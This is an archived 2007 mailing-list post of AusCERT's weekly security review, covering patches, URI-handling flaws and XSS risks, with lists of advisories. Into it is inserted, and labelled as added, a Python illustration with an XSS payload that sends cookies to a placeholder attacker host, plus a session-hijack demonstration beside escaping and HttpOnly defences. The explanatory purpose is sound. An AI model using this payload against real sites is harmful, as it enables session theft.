[AusNOG] AusCERT Week in Review - Week Ending 12/10/2007 (AUSCERT#20073F686)
Richard Billington
richard at auscert.org.au
Fri Oct 12 16:44:56 EST 2007
AusCERT Week in Review
12 October 2007
Greetings,
On Wednesday this week Microsoft announced four critical updates to various
software products that previously had remote code execution
vulnerabilities. These updates were for Windows (Kodak Image Viewer), Word,
Internet Explorer, and Outlook Express (Windows Mail). Even though the
Word vulnerability only affects Word 2000, Word 2002 (part of Office XP),
and Word 2004 (for Mac), there are currently active attacks using this
vulnerability. [1]
If you are running any of the software for which patches were released
then AusCERT recommends either upgrading as soon as possible, or using one
of the workarounds provided by Microsoft. More information can be found
on the Microsoft website
(http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx) and an
initial analysis at Breaking Point Systems
(https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday).
[2][3]
Also this week Adobe announced vulnerabilities in Acrobat, Acrobat Reader,
PageMaker, Illustrator, and GoLive. Each of these have patches available
for them. Of these, the Acrobat and Acrobat Reader "mailto" vulnerabilities
have received the most attention.
This is another of the vulnerabilities related to URI handling in
Windows and in the applications that URIs get passed to. Microsoft
recently released a security advisory on the issue
(http://www.microsoft.com/technet/security/advisory/943521.mspx), as have
a few other people/blogs: [4][5][6]
- http://www.pcworld.com/article/id,138322-pg,1/article.html
- http://blogs.technet.com/msrc/archive/2007/10/10/msrc-blog-additional-details-and-background-on-security-advisory-943521.aspx
Lastly I would like to draw your attention to the area of Cross Site
Scripting (XSS) vulnerabilities. Many people think that these are harmless
"pop-up-an-alert-box" problems. However you have to remember that XSS
vulnerabilities allow a malicious user to inject "active" content into a
vulnerable web page. This means that when a user visits that site they
could have their accounts hijacked, their user settings changed,
advertising added, or their cookies stolen or poisoned.
With cookie theft (or session hijacking), it is possible for an attacker
to obtain the data that a bank or auction website might use to check that
you are logged in and authenticated. This may then allow the attacker to
access those websites as if they were you.
Recently there was an incident where XSS was used to deface a political web
page. In this case it was just a matter of a website defacement, however
a more malicious person could have attempted some of this cookie data
theft. [7][8]
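The cookie-theft path described above, as an added illustration that is not part of the original post or of any AusCERT code: a page handler that reflects user input straight into HTML beside its escaped form, a Set-Cookie builder that marks the session cookie HttpOnly, a check over constructed Set-Cookie lines for cookies that script could read, and the server-side session lookup that makes a stolen cookie equivalent to the victim's login. The attacker host name, session IDs and session table are made up for the example.

```python
import html
from http.cookies import SimpleCookie
from typing import Optional

# Constructed sample payload: what an attacker might inject through a reflected
# parameter to ship the victim's cookies to a host they control. The host name
# is a placeholder, not anything from the original post.
XSS_PAYLOAD = ('<script>document.location="http://attacker.example/?c="'
               '+document.cookie</script>')


def render_search_vulnerable(query: str) -> str:
    """Echoes the user-supplied query straight into the page (reflected XSS)."""
    return f"<html><body><h1>Results for {query}</h1></body></html>"


def render_search_safe(query: str) -> str:
    """Same page, but the query is HTML-escaped before it reaches the markup,
    so '<', '>', '&' and quotes can no longer start a tag or attribute."""
    return (f"<html><body><h1>Results for {html.escape(query, quote=True)}"
            f"</h1></body></html>")


def is_reflected_unescaped(page: str, payload: str) -> bool:
    """Crude reflection check: does the payload survive verbatim in the response?"""
    return payload in page


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for a session cookie that script cannot read.

    HttpOnly keeps document.cookie from returning it; Secure keeps it off
    plaintext HTTP. Neither stops injected script from acting inside the
    victim's session (changing settings, submitting forms), so escaping
    output is still the real fix."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


def cookies_readable_by_script(set_cookie_lines):
    """Given raw Set-Cookie header lines, return the names of cookies that
    lack HttpOnly and so would be exposed by a cookie-theft payload."""
    exposed = []
    for line in set_cookie_lines:
        parts = [p.strip() for p in line.split(";")]
        name = parts[0].split("=", 1)[0]
        flags = {p.lower() for p in parts[1:]}
        if "httponly" not in flags:
            exposed.append(name)
    return exposed


def user_for_request(cookie_header: str, sessions: dict) -> Optional[str]:
    """Server-side lookup: whoever presents a valid session cookie is treated
    as that user. A stolen cookie therefore grants the attacker the victim's
    login without a password."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get("session")
    return sessions.get(morsel.value) if morsel else None


if __name__ == "__main__":
    # Constructed session table standing in for a bank or auction site's store.
    sessions = {"7f3a9c": "alice"}
    page = render_search_vulnerable(XSS_PAYLOAD)
    print("payload reflected unescaped:", is_reflected_unescaped(page, XSS_PAYLOAD))
    print("escaped form:", render_search_safe(XSS_PAYLOAD))
    print(session_cookie_header("7f3a9c"))
    print("exposed cookies:", cookies_readable_by_script(
        ["session=7f3a9c; Path=/", "prefs=dark; HttpOnly; Path=/"]))
    # The attacker replays the stolen cookie and is served as alice.
    print("attacker seen as:", user_for_request("session=7f3a9c", sessions))
```

The escaping in render_search_safe is the fix for the injection itself; HttpOnly only narrows what a successful injection can exfiltrate, which is why the post's other consequences (settings changed, content added) remain possible even with the flag set.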
Regards,
Richard
-- 
Security Analyst | Hotline: +61 7 3365 4417
AusCERT | Fax: +61 7 3365 7031
Australia's National CERT | WWW: www.auscert.org.au
Brisbane QLD Australia | Email: auscert at auscert.org.au
References
[1] Exploit Wednesday follows Patch Tuesday Word update
http://www.theregister.com/2007/10/11/exploit_wednesday/
[2] Microsoft Security Bulletin Summary for October 2007
http://www.microsoft.com/technet/security/bulletin/ms07-oct.mspx
[3] October 2007 Microsoft Tuesday
https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
[4] Microsoft Security Advisory (943521)
http://www.microsoft.com/technet/security/advisory/943521.mspx
[5] Microsoft Finally Fixing Windows Bug
http://www.pcworld.com/article/id,138322-pg,1/article.html
[6] MSRC Blog: Additional Details and Background on Security Advisory 943521
http://blogs.technet.com/msrc/archive/2007/10/10/msrc-blog-additional-details-and-background-on-security-advisory-943521.aspx
[7] XSS flaw makes PM say: "I want to suck your blood"
http://www.zdnet.com.au/news/software/soa/XSS-flaw-makes-PM-say-I-want-to-suck-your-blood-/0,130061733,339282682,00.htm
[8] Howard 'hacker' pleads innocence
http://www.zdnet.com.au/news/security/soa/Howard-hacker-pleads-innocence/0,130061744,339282729,00.htm
Web Log Entries:
----------------
Title: Advance fee fraud scammers researching potential targets
Date: 11 October 2007
URL: http://www.auscert.org.au/8185
Title: Hi! I'm not sure if you remember me ... but I have a trojan for you
Date: 11 October 2007
URL: http://www.auscert.org.au/8181
Alerts, Advisories and Updates:
-------------------------------
Title: AL-2007.0116 -- [Win] -- MS07-057 - Vulnerability in Internet Explorer
could allow Remote Code Execution and Spoofing
Date: 10 October 2007
URL: http://www.auscert.org.au/8174
Title: AL-2007.0115 -- [Win] -- MS07-056 - Vulnerability in Outlook Express
and Windows Mail could allow Remote Code Execution
Date: 10 October 2007
URL: http://www.auscert.org.au/8173
Title: AL-2007.0114 -- [Win] -- Workaround available for Adobe Reader and
Acrobat code execution vulnerability
Date: 09 October 2007
URL: http://www.auscert.org.au/8171
Title: AA-2007.0084 -- [Win][UNIX/Linux] -- Cross Site Scripting (XSS)
vulnerability in BlackBoard Learning System
Date: 09 October 2007
URL: http://www.auscert.org.au/8162
Title: AL-2007.0113 -- [Win][OSX] -- Microsoft October security bulletins
pre-release announcement
Date: 08 October 2007
URL: http://www.auscert.org.au/8168
External Security Bulletins:
----------------------------
Title: ESB-2007.0787 -- [Win][OSX] -- Multiple vulnerabilities in various
Adobe products
Date: 12 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Mac OS X, Windows Vista
URL: http://www.auscert.org.au/8201
Title: ESB-2007.0786 -- [Win] -- CA BrightStor ARCserve Backup Server
Arbitrary Pointer Dereference
Date: 12 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8200
Title: ESB-2007.0785 -- [Win][RedHat][HP-UX][Solaris] -- HP Select Identity,
Remote Unauthorized Access
Date: 12 October 2007
OS: Solaris, Windows 2003, Red Hat Linux, HP-UX
URL: http://www.auscert.org.au/8199
Title: ESB-2007.0784 -- [HP-UX] -- HP-UX running Apache, Remote Unauthorized
Denial of Service (DoS)
Date: 12 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/8198
Title: ESB-2007.0783 -- [Win][UNIX/Linux][RedHat] -- Moderate: tomcat security
update
Date: 12 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
Windows 2003, OpenBSD, Windows 2000, FreeBSD, Other Linux Variants,
Windows XP, Red Hat Linux, Mac OS X, HP-UX, AIX, Windows Vista
URL: http://www.auscert.org.au/8197
Title: ESB-2007.0782 -- [RedHat] -- Important: libvorbis security update
Date: 12 October 2007
OS: Red Hat Linux
URL: http://www.auscert.org.au/8196
Title: ESB-2007.0781 -- [UNIX/Linux][RedHat] -- Important: hplip
(Hewlett-Packard Linux Imaging and Printing Project) security update
Date: 12 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8195
Title: ESB-2007.0780 -- [OpenBSD] -- SSL_get_shared_ciphers() off-by-one
overflow error
Date: 12 October 2007
OS: OpenBSD
URL: http://www.auscert.org.au/8194
Title: ESB-2007.0779 -- [Solaris] -- Security Vulnerability in the Solaris
Auditing (BSM) Related to Network Auditing May Lead to Denial of
Service (DoS)
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8193
Title: ESB-2007.0778 -- [Solaris] -- Multiple Security Issues Within The X
Font Server (xfs(1)) QueryXBitmaps and QueryXExtents Protocol Handlers
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8192
Title: ESB-2007.0777 -- [Win] -- Kaspersky Web Scanner ActiveX Format String
Vulnerability
Date: 11 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8191
Title: ESB-2007.0776 -- [Cisco] -- Cisco IOS Line Printer Daemon (LPD)
Protocol Stack Overflow
Date: 11 October 2007
OS: Cisco Products
URL: http://www.auscert.org.au/8190
Title: ESB-2007.0775 -- [Linux][Cisco] -- Cisco Wireless Control System
Conversion Utility Adds Default Password
Date: 11 October 2007
OS: Debian GNU/Linux, Other Linux Variants, Cisco Products, Red Hat Linux
URL: http://www.auscert.org.au/8189
Title: ESB-2007.0774 -- [Win][Linux][HP-UX] -- HP System Management Homepage
(SMH) Remote Cross Site Scripting (XSS)
Date: 11 October 2007
OS: Debian GNU/Linux, Windows 2003, Windows 2000, Other Linux Variants,
Windows XP, Red Hat Linux, HP-UX, Windows Vista
URL: http://www.auscert.org.au/8188
Title: ESB-2007.0773 -- [HP-UX] -- HP-UX running Apache, Remote Arbitrary Code
Execution, Cross Site Scripting (XSS)
Date: 11 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/8187
Title: ESB-2007.0772 -- [Solaris] -- Security Vulnerabilities in the Solaris
Trusted Extensions "labeld" Service May Lead to a Denial of Service
(DoS) Condition
Date: 11 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8186
Title: ESB-2007.0771 -- [Solaris] -- Security Vulnerability in the Solaris 10
Virtual File System (VFS) may Lead to a Denial of Service (DoS)
Condition
Date: 11 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8184
Title: ESB-2007.0770 -- [UNIX/Linux] -- Asterisk - Buffer overflows in
voicemail when using IMAP storage
Date: 11 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8183
Title: ESB-2007.0769 -- [Debian] -- New xfs packages fix arbitrary code
execution
Date: 11 October 2007
OS: Debian GNU/Linux
URL: http://www.auscert.org.au/8182
Title: ESB-2007.0768 -- [Solaris] -- Security Vulnerability in the
vuidmice(7M) STREAMS Modules May Lead to a Denial of Service (DoS)
Condition
Date: 10 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8180
Title: ESB-2007.0767 -- [OpenBSD] -- Buffer Overflow in OpenBSD dhcpd server
Date: 12 October 2007
OS: OpenBSD
URL: http://www.auscert.org.au/8179
Title: ESB-2007.0766 -- [Win] -- MS07-059 - Vulnerability in Windows
SharePoint Services 3.0 and Office SharePoint Server 2007
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8178
Title: ESB-2007.0765 -- [Win] -- MS07-058 - Vulnerability in RPC Could Allow
Denial of Service
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Windows Vista
URL: http://www.auscert.org.au/8177
Title: ESB-2007.0764 -- [Win][OSX] -- MS07-060 - Vulnerability in Microsoft
Word Could Allow Remote Code Execution
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP, Mac OS X, Windows Vista
URL: http://www.auscert.org.au/8176
Title: ESB-2007.0763 -- [Win] -- MS07-055 - Vulnerability in Kodak Image
Viewer Could Allow Remote Code Execution
Date: 10 October 2007
OS: Windows 2003, Windows 2000, Windows XP
URL: http://www.auscert.org.au/8175
Title: ESB-2007.0762 -- [Win][UNIX/Linux][RedHat] -- Moderate: opal security
update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Windows 98/98SE, Debian GNU/Linux, Other BSD
Variants, IRIX, Windows 2003, OpenBSD, Windows 2000, FreeBSD, Other
Linux Variants, Windows XP, Red Hat Linux, Windows NT 4, Mac OS X,
HP-UX, AIX, Windows Vista, Windows ME
URL: http://www.auscert.org.au/8170
Title: ESB-2007.0761 -- [Win][UNIX/Linux] -- Moderate: pwlib security update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Windows 98/98SE, Debian GNU/Linux, Other BSD
Variants, IRIX, Windows 2003, OpenBSD, Windows 2000, FreeBSD, Other
Linux Variants, Windows XP, Red Hat Linux, Windows NT 4, Mac OS X,
HP-UX, AIX, Windows Vista, Windows ME
URL: http://www.auscert.org.au/8169
Title: ESB-2007.0760 -- [UNIX/Linux][RedHat] -- Moderate: kdelibs security
update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8167
Title: ESB-2007.0759 -- [UNIX/Linux][RedHat] -- Moderate: kdebase security
update
Date: 09 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8166
Title: ESB-2007.0758 -- [Linux][Debian] -- New lighttpd packages fix buffer
overflow
Date: 08 October 2007
OS: Solaris, HP Tru64 UNIX, Debian GNU/Linux, Other BSD Variants, IRIX,
OpenBSD, FreeBSD, Other Linux Variants, Red Hat Linux, Mac OS X, HP-UX,
AIX
URL: http://www.auscert.org.au/8165
Title: ESB-2007.0757 -- [Debian] -- New xen-utils packages fix several
vulnerabilities
Date: 08 October 2007
OS: Debian GNU/Linux
URL: http://www.auscert.org.au/8164
Title: ESB-2007.0750 -- [UNIX/Linux] -- Patches available to correct
vulnerabilities in Drupal Project issue tracking and Boost modules
Date: 09 October 2007
OS: AIX, HP-UX, Mac OS X, Red Hat Linux, Other Linux Variants, FreeBSD,
OpenBSD, IRIX, Other BSD Variants, Debian GNU/Linux, HP Tru64 UNIX,
Solaris
URL: http://www.auscert.org.au/8155
Title: ESB-2007.0745 -- [Solaris] -- Security Vulnerability in Solaris Named
Pipes (pipe(2)) May Allow Unauthorized Data Access
Date: 08 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8150
Title: ESB-2007.0739 -- [Solaris] -- Sun Fire X2100 M2/X2200 M2 ELOM is
Vulnerable to Unauthorized Access
Date: 08 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8143
Title: ESB-2007.0728 -- [Solaris] -- Local DoS in the Human Interface Device
(HID) Class Driver for Solaris
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8128
Title: ESB-2007.0683 -- [Solaris] -- Security Vulnerability in RPCSEC_GSS
(rpcsec_gss(3NSL)) Affects Kerberos Administration Daemon (kadmind(1M))
Date: 12 October 2007
OS: Solaris
URL: http://www.auscert.org.au/8058
Title: ESB-2007.0560 -- [Solaris] -- Security Vulnerability in Mozilla 1.7 May
Allow Arbitrary JavaScript Commands to be Run
Date: 10 October 2007
OS: Solaris
URL: http://www.auscert.org.au/7897
Title: ESB-2005.0409 -- HP Security Bulletin HPSBUX01137 -- SSRT5954 rev.11 -
HP-UX TCP/IP Remote Denial of Service (DoS)
Date: 09 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/5121
Title: ESB-2007.0036 -- [HP-UX] -- HPSBUX02181 SSRT061289 rev.1 - HP-UX
Running IPFilter, Remote Unauthorized Denial of Service (DoS)
Date: 11 October 2007
OS: HP-UX
URL: http://www.auscert.org.au/7205
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert at auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================